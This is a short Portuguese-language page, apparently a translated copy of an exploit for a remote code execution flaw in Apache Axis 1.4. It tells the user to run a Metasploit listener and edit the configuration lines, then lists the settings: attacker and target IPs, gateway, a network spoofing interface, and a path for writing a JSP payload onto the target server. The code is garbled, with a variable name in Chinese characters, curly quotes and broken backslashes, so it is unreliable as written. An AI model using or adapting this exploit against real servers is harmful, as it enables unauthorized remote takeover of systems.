
Vulnerabilidade de execução remota de código no Apache Axis 1.4
Apache Axis 1.4 - Vulnerabilidade de Execução Remota de Código É necessário configurar um listener no msf local e modificar as linhas 24-30 do código
#Você precisa alterar estas variáveis para corresponder à sua configuração myip = “ 192.168.0.117 ” #IP da sua máquina target = “ 192.168.0.102 ” #IP alvo 网关= “ 192.168.0.1 ” #Gateway padrão targetport = “ 8080 ” #Porta onde o target executa o Axis (provavelmente 8080) pathtoaxis = “ http://192.168.0.102:8080/axis ” #Este pode ser o caminho personalizado da instalação do Axis, mas este é o padrão spoofinterface = “ eth0 ” #Interface de spoofing jspwritepath = “ webapps \ axis \ exploit.jsp ” #Caminho relativo para escrever o payload JSP no alvo. Este é o caminho padrão da instalação do Tomcat